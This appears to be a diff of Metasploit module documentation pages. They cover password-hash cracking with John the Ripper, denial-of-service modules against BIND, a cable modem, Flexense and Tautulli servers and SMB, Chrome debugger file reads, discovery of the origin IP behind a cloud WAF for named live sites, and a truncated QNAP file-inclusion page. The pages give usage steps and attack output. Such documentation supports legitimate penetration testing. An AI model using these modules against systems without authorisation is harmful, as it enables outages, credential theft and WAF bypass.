|
||||
|
||||
The max-run-time for each iteration of cracking
|
||||
|
||||
**JOHN_PATH**
|
||||
|
||||
The absolute path to the John the Ripper executable. Default behavior is to search `path` for
|
||||
`john` and `john.exe`.
|
||||
|
||||
**KORELOGIC**
|
||||
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
|
||||
**MUTATE**
|
||||
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
|
||||
* `'@' => 'a'`
|
||||
* `'0' => 'o'`
|
||||
* `'3' => 'e'`
|
||||
* `'$' => 's'`
|
||||
* `'7' => 't'`
|
||||
* `'1' => 'l'`
|
||||
* `'5' => 's'`
|
||||
|
||||
Default is `false`.
|
||||
|
||||
**POT**
|
||||
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
|
||||
**USE_CREDS**
|
||||
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
|
||||
**USE_DB_INFO**
|
||||
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
|
||||
**USE_DEFAULT_WORDLIST**
|
||||
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
|
||||
**USE_HOSTNAMES**
|
||||
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
|
||||
**USE_ROOT_WORDS**
|
||||
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
|
||||
## Scenarios
|
||||
|
||||
Create hashes:
|
||||
|
||||
```
|
||||
creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
|
||||
```
|
||||
|
||||
Crack them:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/analyze/jtr_postgres_fast
|
||||
msf5 auxiliary(analyze/jtr_postgres_fast) > run
|
||||
|
||||
[*] Hashes written out to /tmp/hashes_tmp20190211-6421-1hooxft
|
||||
[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1hv6clq
|
||||
[*] Cracking dynamic_1034 hashes in normal wordlist mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking dynamic_1034 hashes in single mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking dynamic_1034 hashes in incremental mode (Digits)...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracked passwords this run:
|
||||
[+] example:password
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(analyze/jtr_postgres_fast) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type JtR Format
|
||||
---- ------ ------- ------ ------- ----- ------------ ----------
|
||||
example md5be86a79bf2043622d58d5453c47d4860 Postgres md5 raw-md5,postgres
|
||||
example password Password
|
||||
|
||||
```
|
||||
@@ -1,158 +0,0 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Windows
|
||||
based password hashes, such as:
|
||||
|
||||
* `LM`, or `LANMAN` based passwords
|
||||
* `NT`, `NTLM`, or `NTLANMAN` based passwords
|
||||
|
||||
Sources of hashes can be found here:
|
||||
[source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Have at least one user with an `nt` or `lm` password in the database
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/analyze/jtr_windows_fast```
|
||||
4. Do: ```run```
|
||||
5. You should hopefully crack a password.
|
||||
|
||||
## Options
|
||||
|
||||
|
||||
**CONFIG**
|
||||
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
|
||||
**CUSTOM_WORDLIST**
|
||||
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
|
||||
**DeleteTempFiles**
|
||||
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
|
||||
**ITERATION_TIMEOUT**
|
||||
|
||||
The max-run-time for each iteration of cracking
|
||||
|
||||
**JOHN_PATH**
|
||||
|
||||
The absolute path to the John the Ripper executable. Default behavior is to search `path` for
|
||||
`john` and `john.exe`.
|
||||
|
||||
**KORELOGIC**
|
||||
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
|
||||
**MUTATE**
|
||||
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
|
||||
* `'@' => 'a'`
|
||||
* `'0' => 'o'`
|
||||
* `'3' => 'e'`
|
||||
* `'$' => 's'`
|
||||
* `'7' => 't'`
|
||||
* `'1' => 'l'`
|
||||
* `'5' => 's'`
|
||||
|
||||
Default is `false`.
|
||||
|
||||
**POT**
|
||||
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
|
||||
**USE_CREDS**
|
||||
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
|
||||
**USE_DB_INFO**
|
||||
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
|
||||
**USE_DEFAULT_WORDLIST**
|
||||
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
|
||||
**USE_HOSTNAMES**
|
||||
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
|
||||
**USE_ROOT_WORDS**
|
||||
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
|
||||
## Scenarios
|
||||
|
||||
Create hashes:
|
||||
|
||||
```
|
||||
creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm
|
||||
creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
|
||||
```
|
||||
|
||||
Crack them:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/analyze/jtr_windows_fast
|
||||
msf5 auxiliary(analyze/jtr_windows_fast) > run
|
||||
|
||||
[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-koittz
|
||||
[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1v82lkm
|
||||
[*] Cracking lm hashes in normal wordlist mode...
|
||||
Using default input encoding: UTF-8
|
||||
Using default target encoding: CP850
|
||||
Warning: poor OpenMP scalability for this hash type, consider --fork=8
|
||||
Will run 8 OpenMP threads
|
||||
Press 'q' or Ctrl-C to abort, almost any other key for status
|
||||
0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 1177Kp/s 1177Kc/s 1177KC/s PLANO..VAGRANT
|
||||
Session completed
|
||||
[*] Cracking lm hashes in single mode...
|
||||
Using default input encoding: UTF-8
|
||||
Using default target encoding: CP850
|
||||
Warning: poor OpenMP scalability for this hash type, consider --fork=8
|
||||
Will run 8 OpenMP threads
|
||||
Press 'q' or Ctrl-C to abort, almost any other key for status
|
||||
0g 0:00:00:02 DONE (2019-02-11 19:34) 0g/s 4634Kp/s 4634Kc/s 4634KC/s WAC1907..E1900
|
||||
Session completed
|
||||
[*] Cracking lm hashes in incremental mode (Digits)...
|
||||
Using default input encoding: UTF-8
|
||||
Using default target encoding: CP850
|
||||
Warning: poor OpenMP scalability for this hash type, consider --fork=8
|
||||
Will run 8 OpenMP threads
|
||||
Press 'q' or Ctrl-C to abort, almost any other key for status
|
||||
0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 41152Kp/s 41152Kc/s 41152KC/s 0766269..0769743
|
||||
Session completed
|
||||
[*] Cracked Passwords this run:
|
||||
[+] lm_password:password
|
||||
[*] Cracking nt hashes in normal wordlist mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking nt hashes in single mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking nt hashes in incremental mode (Digits)...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracked Passwords this run:
|
||||
[+] lm_password:password
|
||||
[+] nt_password:password
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(analyze/jtr_windows_fast) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type JtR Format
|
||||
---- ------ ------- ------ ------- ----- ------------ ----------
|
||||
lm_password password Password
|
||||
lm_password e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c NTLM hash nt,lm
|
||||
nt_password password Password
|
||||
nt_password aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c NTLM hash nt,lm
|
||||
|
||||
```
|
||||
@@ -0,0 +1,53 @@
|
||||
## Vulnerable Application
|
||||
The following versions of BIND.
|
||||
|
||||
- 9.0.0 -> 9.11.18
|
||||
- 9.12.0 -> 9.12.4-P2
|
||||
- 9.14.0 -> 9.14.11
|
||||
- 9.16.0 -> 9.16.2
|
||||
- 9.17.0 -> 9.17.1 of the 9.17 experimental development branch.
|
||||
- All releases in the obsolete 9.13 and 9.15 development branches.
|
||||
- All releases of BIND Supported Preview Edition from 9.9.3-S1 -> 9.11.18-S1.
|
||||
|
||||
The attacker must know the name of the real TSIGKey on the target in order to exploit CVE-2020-8617. However, by
|
||||
default, BIND generates a TSIGKey that name of "local-ddns" at boot time. As such, the majority of target versions are
|
||||
vulnerable to this attack.
|
||||
|
||||
```
|
||||
$ sudo cat /var/run/named/session.key
|
||||
key "local-ddns" {
|
||||
algorithm hmac-sha256;
|
||||
secret "s/+GOoQRryn/VVndpmFHsgDOBLwndh1zEjVJLK5jo04=";
|
||||
};
|
||||
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
1. Start the vulnerable server
|
||||
2. Start `msfconsole`
|
||||
3. Do: ```use auxiliary/dos/dns/bind_tsig_badtime```
|
||||
4. Do: ```run```
|
||||
5. The server should crash
|
||||
|
||||
## Options
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Server output from crash
|
||||
|
||||
```
|
||||
26-May-2020 02:45:59.565 general: critical: tsig.c:954: INSIST(msg->verified_sig) failed, back trace
|
||||
26-May-2020 02:45:59.565 general: critical: #0 0x563435d6aa40 in __do_global_dtors_aux_fini_array_entry()+0x5634357f6888
|
||||
26-May-2020 02:45:59.565 general: critical: #1 0x563435f49c0a in __do_global_dtors_aux_fini_array_entry()+0x5634359d5a52
|
||||
26-May-2020 02:45:59.565 general: critical: #2 0x563435ecfcb9 in __do_global_dtors_aux_fini_array_entry()+0x56343595bb01
|
||||
26-May-2020 02:45:59.565 general: critical: #3 0x563435e14b19 in __do_global_dtors_aux_fini_array_entry()+0x5634358a0961
|
||||
26-May-2020 02:45:59.565 general: critical: #4 0x563435d5b57f in __do_global_dtors_aux_fini_array_entry()+0x5634357e73c7
|
||||
26-May-2020 02:45:59.565 general: critical: #5 0x563435d5cffd in __do_global_dtors_aux_fini_array_entry()+0x5634357e8e45
|
||||
26-May-2020 02:45:59.565 general: critical: #6 0x563435d5d6a8 in __do_global_dtors_aux_fini_array_entry()+0x5634357e94f0
|
||||
26-May-2020 02:45:59.565 general: critical: #7 0x563435d5f1a7 in __do_global_dtors_aux_fini_array_entry()+0x5634357eafef
|
||||
26-May-2020 02:45:59.565 general: critical: #8 0x563435f716d9 in __do_global_dtors_aux_fini_array_entry()+0x5634359fd521
|
||||
26-May-2020 02:45:59.565 general: critical: #9 0x7f6513f576db in __do_global_dtors_aux_fini_array_entry()+0x7f65139e3523
|
||||
26-May-2020 02:45:59.565 general: critical: #10 0x7f6513c8088f in __do_global_dtors_aux_fini_array_entry()+0x7f651370c6d7
|
||||
26-May-2020 02:45:59.565 general: critical: exiting (due to assertion failure)
|
||||
```
|
||||
|
||||
@@ -0,0 +1,44 @@
|
||||
## Vulnerable Application
|
||||
|
||||
Sagecom F@st-3890 Cable Modems
|
||||
|
||||
Please note that successful completion of this module will most likely knock out upstream network services, including any remote sessions connected through the cable modem.
|
||||
|
||||
Please refer to [https://cablehaunt.com/](https://cablehaunt.com/) for more information on this vulnerability.
|
||||
|
||||
## Options
|
||||
|
||||
**WS_USERNAME**
|
||||
|
||||
This is the basic auth username for the spectrum analysis web service. This is typicall default credentials such as `admin:password` but may also be something along the lines of `spectrum:spectrum`. This will vary from manufacturer to manufacturer and ISP to ISP.
|
||||
|
||||
**WS_PASSWORD**
|
||||
|
||||
This is the basic auth password for the spectrum analysis web service.
|
||||
|
||||
**TIMEOUT**
|
||||
|
||||
This is the timeout in seconds that the module should wait before making a conclusion on the success of the payload delivery. Typically, the device crashes within about 5 second of the payload being delivered. The default value of `15` should be seen as the lower bound for `TIMEOUT` values.
|
||||
|
||||
**RHOSTS**
|
||||
|
||||
Typically the only address which should be used for this value is `192.168.100.1`. It can be different, but not in a well-secured configuration.
|
||||
|
||||
**RPORT**
|
||||
|
||||
On some devices the Spectrum Analysis web service runs on port `8080`, though Lyrebirds (the original discoverer and PoC author) notes that sometimes it can run on port `6080`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf5 auxiliary(dos/http/cable_haunt_websocket_dos) > run
|
||||
[*] Running module against 192.168.100.1
|
||||
|
||||
[*] Attempting Connection to 192.168.100.1
|
||||
[*] Opened connection
|
||||
[*] Sending payload
|
||||
[*] Checking Modem Status
|
||||
[*] Cable Modem unreachable
|
||||
[+] Exploit delivered and cable modem unreachable.
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
@@ -1,14 +1,14 @@
|
||||
## Description
|
||||
This module triggers a Denial of Service vulnerability in the Flexense Enterprise HTTP server. It is possible to trigger
|
||||
a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.
|
||||
## Vulnerable Application
|
||||
|
||||
### Description
|
||||
|
||||
This module triggers a Denial of Service vulnerability in the Flexense Enterprise HTTP server. It is possible to trigger
|
||||
a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.
|
||||
|
||||
## Verification Steps
|
||||
According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24
|
||||
Following list of softwares are vulnerable to Denial Of Service.
|
||||
read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065
|
||||
|
||||
|
||||
DiskBoss Enterprise <= v9.0.18
|
||||
Sync Breeze Enterprise <= v10.6.24
|
||||
Disk Pulse Enterprise <= v10.6.24
|
||||
@@ -16,8 +16,7 @@ Disk Savvy Enterprise <= v10.6.24
|
||||
Dup Scout Enterprise <= v10.6.24
|
||||
VX Search Enterprise <= v10.6.24
|
||||
|
||||
|
||||
**Vulnerable Application Link**
|
||||
**Vulnerable Application Link**
|
||||
http://www.diskboss.com/downloads.html
|
||||
http://www.syncbreeze.com/downloads.html
|
||||
http://www.diskpulse.com/downloads.html
|
||||
@@ -25,7 +24,8 @@ http://www.disksavvy.com/downloads.html
|
||||
http://www.dupscout.com/downloads.html
|
||||
|
||||
|
||||
## Vulnerable Application Installation Setup.
|
||||
### Installation Setup.
|
||||
|
||||
All Flexense applications that are listed above can be installed by following these steps.
|
||||
|
||||
Download Application : ```https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS/raw/master/syncbreezeent_setup_v10.6.24.exe```
|
||||
@@ -51,7 +51,9 @@ Check the box saying: ```Enable web server on port:...```
|
||||
8. Web server will crash after 200-1000 request depending on the OS version and system memory.
|
||||
|
||||
## Scenarios
|
||||
**TESTED AGAINST WINDOWS 7/10**
|
||||
|
||||
### WINDOWS 7/10
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/dos/http/flexense_http_server_dos
|
||||
msf5 auxiliary(dos/http/flexense_http_server_dos) > set rhost 192.168.1.27
|
||||
|
||||
@@ -6,7 +6,7 @@ Versions before 0.3.19 are vulnerable.
|
||||
Any application that uses a vulnerable version of this module and passes untrusted input
|
||||
to the module will be vulnerable.
|
||||
|
||||
## How to Install
|
||||
### How to Install
|
||||
|
||||
To install a vulnerable version of `marked`, run:
|
||||
```
|
||||
@@ -15,8 +15,6 @@ npm i marked@0.3.19
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Create a new directory for test application.
|
||||
2. Copy below example server into test application directory as `server.js`.
|
||||
3. Run `npm i express` to install express in the test application directory.
|
||||
|
||||
@@ -0,0 +1,16 @@
|
||||
## Vulnerable Application
|
||||
Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the `/shutdown` URL in applications that do
|
||||
not have a user login area enabled.
|
||||
|
||||
## Scenario
|
||||
|
||||

|
||||
|
||||
## Verification Steps :
|
||||
|
||||
List the steps needed to make sure this thing works
|
||||
|
||||
1. Start ```msfconsole```
|
||||
2. ```use auxiliary/dos/http/tautulli_shutdown_exec```
|
||||
3. ```set RHOSTS XXX.XXX.XXX.XXX```
|
||||
4. ```run```
|
||||
@@ -6,7 +6,7 @@ Any application that uses a vulnerable version of this module and calls the `get
|
||||
or `getResult` functions will be vulnerable to this module. An example server is provided
|
||||
below.
|
||||
|
||||
## How to Install
|
||||
### How to Install
|
||||
|
||||
To install a vulnerable version of `ua-parser-js`, run:
|
||||
```
|
||||
@@ -15,8 +15,6 @@ npm i ua-parser-js@0.7.15
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Create a new directory for test application.
|
||||
2. Copy below example server into test application directory as `server.js`.
|
||||
3. Run `npm i express` to install express in the test application directory.
|
||||
|
||||
@@ -10,18 +10,14 @@
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Start msfconsole
|
||||
1. Do: `use auxiliary/dos/smb/smb_loris`
|
||||
1. Do: `set rhost [IP]`
|
||||
1. Do: `run`
|
||||
1. Target should allocate increasing amounts of memory.
|
||||
2. Do: `use auxiliary/dos/smb/smb_loris`
|
||||
3. Do: `set rhost [IP]`
|
||||
4. Do: `run`
|
||||
5. Target should allocate increasing amounts of memory.
|
||||
|
||||
## Scenarios
|
||||
|
||||
###
|
||||
|
||||
```
|
||||
msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
|
||||
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
|
||||
|
||||
@@ -1,9 +1,9 @@
|
||||
# Chrome Debugger Arbitary File Read / Abitrary Web Request Auxiliary Module
|
||||
## Vulnerable Application
|
||||
|
||||
This module takes advantage of misconfigured headless chrome sessions and either retrieves a specified file off the remote file system, or makes a web request from the remote machine.
|
||||
|
||||
## Headless Chrome Sessions
|
||||
|
||||
This can be useful for retrieving cloud metadata in certain scenarios. Primarily this module targets developers.
|
||||
|
||||
A vulnerable Headless Chrome session can be started with the following command:
|
||||
|
||||
```
|
||||
@@ -13,7 +13,7 @@ $ google-chrome --remote-debugging-port=9222 --headless --remote-debugging-addre
|
||||
This will start a webserver running on port 9222 for all network interfaces.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Execute `auxiliary/gather/chrome_debugger`
|
||||
3. Execute `set RHOST $REMOTE_ADDRESS`
|
||||
@@ -23,12 +23,17 @@ This will start a webserver running on port 9222 for all network interfaces.
|
||||
|
||||
## Options
|
||||
|
||||
* FILEPATH - The file path on the remote you wish to retrieve
|
||||
* URL - A URL you wish to fetch the contents of from the remote machine
|
||||
**FILEPATH**
|
||||
|
||||
The file path on the remote you wish to retrieve.
|
||||
|
||||
**URL**
|
||||
|
||||
A URL you wish to fetch the contents of from the remote machine.
|
||||
|
||||
**Note:** One or the other must be set!
|
||||
|
||||
## Example Run
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
[*] Attempting Connection to ws://192.168.20.168:9222/devtools/page/CF551031373306B35F961C6C0968DAEC
|
||||
@@ -40,7 +45,3 @@ This will start a webserver running on port 9222 for all network interfaces.
|
||||
[+] Retrieved resource
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
## Notes
|
||||
|
||||
This can be useful for retrieving cloud metadata in certain scenarios. Primarily this module targets developers.
|
||||
|
||||
@@ -0,0 +1,214 @@
|
||||
This module can be useful if you need to test the security of your server and your
|
||||
website behind a solution Cloud based. By discovering the origin IP address of the
|
||||
targeted host.
|
||||
|
||||
More precisely, this module uses multiple data sources (in order ViewDNS.info, DNS enumeration and Censys)
|
||||
to collect assigned (or have been assigned) IP addresses from the targeted site or domain
|
||||
that uses the following:
|
||||
Amazon Cloudflare, Amazon CloudFront, ArvanCloud, Envoy Proxy, Fastly, Stackpath Fireblade,
|
||||
Stackpath MaxCDN, Imperva Incapsula, InGen Security (BinarySec EasyWAF), KeyCDN, Microsoft AzureCDN,
|
||||
Netlify and Sucuri.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: `use auxiliary/gather/cloud_lookup`
|
||||
3. Do: `set hostname www.zataz.com`
|
||||
4. Do: `run`
|
||||
|
||||
## Options
|
||||
|
||||
### CENSYS_SECRET
|
||||
|
||||
Your Censys API SECRET.
|
||||
|
||||
### CENSYS_UID
|
||||
|
||||
Your Censys API UID.
|
||||
|
||||
### COMPSTR
|
||||
|
||||
You can use a custom string to perform the comparison.
|
||||
|
||||
### HOSTNAME
|
||||
|
||||
This is the hostname [fqdn] on which the website responds. But this can also be a domain.
|
||||
|
||||
msf5 auxiliary(gather/cloud_lookup) > set hostname www.zataz.com
|
||||
--or--
|
||||
msf5 auxiliary(gather/cloud_lookup) > set hostname discordapp.com
|
||||
|
||||
### IPBLACKLIST_FILE
|
||||
|
||||
Files containing IP addresses to blacklist during the analysis process, one per line. It's optional.
|
||||
|
||||
### THREADS
|
||||
|
||||
Number of concurent threads needed for DNS enumeration. Default: 8
|
||||
|
||||
### WORDLIST
|
||||
|
||||
Name list required for DNS enumeration. Default: ~/metasploit-framework/data/wordlists/namelist.txt
|
||||
|
||||
## Advanced options
|
||||
|
||||
### ALLOW_NOWAF
|
||||
|
||||
Automatically switch to NoWAFBypass when detection fails with the Automatic action. Default: false
|
||||
|
||||
### NS
|
||||
|
||||
Specify the nameserver to use for queries. Default: is system DNS
|
||||
|
||||
### REPORT_LEAKS
|
||||
|
||||
Set to write leaked ip addresses in notes. Default: false
|
||||
|
||||
### USERAGENT
|
||||
|
||||
Specify a personalized User-Agent header in HTTP requests.
|
||||
Default: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
|
||||
|
||||
### TAG
|
||||
|
||||
Specify the HTML tag in which you want to find the fingerprint. Default: title
|
||||
Useful when combined with the CMPSTR option.
|
||||
|
||||
### HTTP_TIMEOUT
|
||||
|
||||
HTTP(s) request timeout. Default: 8
|
||||
|
||||
## Scenarios
|
||||
|
||||
### For auditing purpose
|
||||
|
||||
If successful, you must be able to obtain the IP(s) address of the website as follows:
|
||||
|
||||
```
|
||||
msf5 auxiliary(gather/cloud_lookup) > set verbose true
|
||||
verbose => true
|
||||
msf5 auxiliary(gather/cloud_lookup) > run
|
||||
|
||||
[*] Selected action: Amazon CloudFlare
|
||||
[*] Passive gathering information...
|
||||
[*] * ViewDNS.info: 17 IP address found(s).
|
||||
[*] * DNS Enumeration: 6 IP address found(s).
|
||||
[*] Clean Amazon CloudFlare server(s)...
|
||||
[*] * TOTAL: 10 IP address found(s) after cleaning.
|
||||
[*]
|
||||
[*] Bypass Automatic is in progress...
|
||||
[*] * Initial request to the original server for <title> comparison
|
||||
[*] * Trying: http://XXX.XXX.XXX.XXX:80/
|
||||
[+] A direct-connect IP address was found: http://XXX.XXX.XXX.XXX:80/
|
||||
[*] * Trying: https://XXX.XXX.XXX.XXX:443/
|
||||
--> responded with an unhandled HTTP status code: 504
|
||||
[*] * Trying: http://XXX.XXX.XXX.XXX:80/
|
||||
[*] * Trying: https://XXX.XXX.XXX.XXX:443/
|
||||
[*] * Trying: http://XXX.XXX.XXX.XXX:80/
|
||||
[+] A direct-connect IP address was found: http://XXX.XXX.XXX.XXX:80/
|
||||
[*] * Trying: https://XXX.XXX.XXX.XXX:443/
|
||||
--> responded with an unhandled HTTP status code: 504
|
||||
[*] * Trying: http://XXX.XXX.XXX.XXX:80/
|
||||
[+] A direct-connect IP address was found: http://XXX.XXX.XXX.XXX:80/
|
||||
[*] * Trying: https://XXX.XXX.XXX.XXX:443/
|
||||
--> responded with an unhandled HTTP status code: 403
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
In this case 'A direct-connect IP address was found' is reported.
|
||||
|
||||
However, some disreputable administrators used a simple redircetion (301 and 302)
|
||||
to force the passage through the WAF. This makes the IP address leak in the 'location'
|
||||
parameter of the HTTP header.
|
||||
|
||||
For example:
|
||||
|
||||
```
|
||||
msf5 auxiliary(gather/cloud_lookup) > set hostname www.exodata.fr
|
||||
hostname => www.exodata.fr
|
||||
msf5 auxiliary(gather/cloud_lookup) > run
|
||||
|
||||
[*] Selected action: Amazon CloudFlare
|
||||
[*] Passive gathering information...
|
||||
[*] * ViewDNS.info: 3 IP address found(s).
|
||||
[*] * DNS Enumeration: 12 IP address found(s).
|
||||
[*] Clean Amazon CloudFlare server(s)...
|
||||
[*] * TOTAL: 4 IP address found(s) after cleaning.
|
||||
[*]
|
||||
[*] Bypass Automatic is in progress...
|
||||
[*] * Initial request to the original server for <title> comparison
|
||||
[*] * Trying: http://41.213.135.13:80/
|
||||
[*] * Trying: https://41.213.135.13:443/
|
||||
--> responded with HTTP status code: 302 to http://www.exodata.fr/
|
||||
[!] A leaked IP address was found: https://41.213.135.13:443/
|
||||
[*] * Trying: http://185.161.8.26:80/
|
||||
--> responded with HTTP status code: 302 to https://www.exodata.fr/
|
||||
[!] A leaked IP address was found: http://185.161.8.26:80/
|
||||
[*] * Trying: https://185.161.8.26:443/
|
||||
[-] No direct-connect IP address found :-(
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
*or*
|
||||
|
||||
```
|
||||
msf5 auxiliary(gather/cloud_lookup) > set verbose false
|
||||
verbose => false
|
||||
msf5 auxiliary(gather/cloud_lookup) > set hostname www.ingensecurity.com
|
||||
hostname => www.ingensecurity.com
|
||||
msf5 auxiliary(gather/cloud_lookup) > run
|
||||
|
||||
[*] Passive gathering information...
|
||||
[*] * ViewDNS.info: 2 IP address found(s).
|
||||
[*] * DNS Enumeration: 8 IP address found(s).
|
||||
[*] Clean InGen Security (BinarySec EasyWAF) server(s)...
|
||||
[*] * TOTAL: 4 IP address found(s) after cleaning.
|
||||
[*]
|
||||
[*] Bypass Automatic is in progress...
|
||||
[*] * Initial request to the original server for <title> comparison
|
||||
[!] A leaked IP address was found: http://188.165.33.235:80/
|
||||
[-] No direct-connect IP address found :-(
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
In this case 'A leaked IP address was found' is displayed but the bypass
|
||||
is NOT effective.
|
||||
|
||||
You can also use the `REPORT_LEAKS` option to write that in the notes.
|
||||
|
||||
For some reason you may need to change the URI path to interoperate with
|
||||
a page other than the index page.
|
||||
|
||||
For example:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/gather/cloud_lookup
|
||||
msf5 auxiliary(gather/cloud_lookup) > set HOSTNAME www.zataz.com
|
||||
hostname => www.zataz.com
|
||||
msf5 auxiliary(gather/cloud_lookup) > set URIPATH /contacter/
|
||||
uripath => /contacter/
|
||||
msf5 auxiliary(gather/cloud_lookup) > set compstr Contacter ZATAZ
|
||||
compstr => Contacter ZATAZ
|
||||
msf5 auxiliary(gather/cloud_lookup) > run
|
||||
...
|
||||
```
|
||||
|
||||
*or*
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/gather/cloud_lookup
|
||||
msf5 auxiliary(gather/cloud_lookup) > set HOSTNAME www.zataz.com
|
||||
hostname => www.zataz.com
|
||||
msf5 auxiliary(gather/cloud_lookup) > set URIPATH /contacter/
|
||||
uripath => /contacter/
|
||||
msf5 auxiliary(gather/cloud_lookup) > set compstr Contacter ZATAZ
|
||||
compstr => Contacter ZATAZ
|
||||
msf5 auxiliary(gather/cloud_lookup) > set tag html
|
||||
tag => html
|
||||
msf5 auxiliary(gather/cloud_lookup) > run
|
||||
...
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
1. <https://citadelo.com/en/blog/cloudflare-how-to-do-it-right-and-do-not-reveal-your-real-ip/>
|
||||
@@ -0,0 +1,193 @@
|
||||
## Vulnerable Application
|
||||
|
||||
### Introduction
|
||||
|
||||
This module exploits a local file inclusion in QNAP QTS and Photo
|
||||
Station that allows an unauthenticated attacker to download files from
|
||||
the QNAP filesystem.
|
||||
|
||||
Because the HTTP server runs as root, it is possible to access
|
||||
sensitive files, such as SSH private keys and password hashes.
|
||||
|
||||
`/etc/shadow` entries can be processed offline, the module saves them in the creds,
|
||||
and they can be cracked using john the ripper, or hashcat.
|
||||
|
||||
There is some confusion in the CVEs assigned to this vulnerability, it corresponds to
|
||||
one of these : CVE-2019-7192, CVE-2019-7194 or CVE-2019-7195, notice that two of them
|
||||
have the same description.
|
||||
|
||||
## Verification Steps
|
